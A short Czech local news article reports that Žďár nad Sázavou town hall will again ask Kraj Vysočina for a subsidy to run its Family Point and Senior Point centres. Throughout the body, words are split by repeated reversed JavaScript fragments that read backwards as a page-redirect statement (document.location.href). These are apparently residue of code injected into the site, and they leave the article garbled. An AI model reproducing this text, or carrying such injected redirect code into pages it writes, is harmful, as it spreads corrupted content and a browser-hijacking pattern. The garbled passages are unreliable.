Rainbow page separator

Radnice požádá o dotaci na provoz Family a Senior Pointu

Středa, 27. února 2019

Peníze, papírové bankovky

Žďár nad Sázavou / O dotaci na provoz zařízení Family Point pro rodiče s dětmi a Senior Point pro seniory, která již od lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu 2015 sídlí ve čtvrtém patře žďárské polikliniky, požádá žďárská radnice opět Kraj Vysočina. Provozní náklady jsou financovány z rozpočtu města, nicméně měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to má k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to účelu možnost využít právě krajskou dotaci.
Například v loňském roce oba „pointy“ podpořily krajské peníze ve výši 360 tisíc korun, Žďár zařízení provozuje prostřednictvím Kolpingova díla ČR.
Služby Family i Senior Pointu jsou pro zájemce zdarma, přičemž jejich podsta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou je posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování informací cílovým skupinám, kterými jsou rodiny s dětmi a senioři, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to především v oblasti sociální a zdravotních služeb. Rovněž tam dochází k mezigeneračním schůzkám seniorů a rodičů s dětmi a četným dalším aktivitám.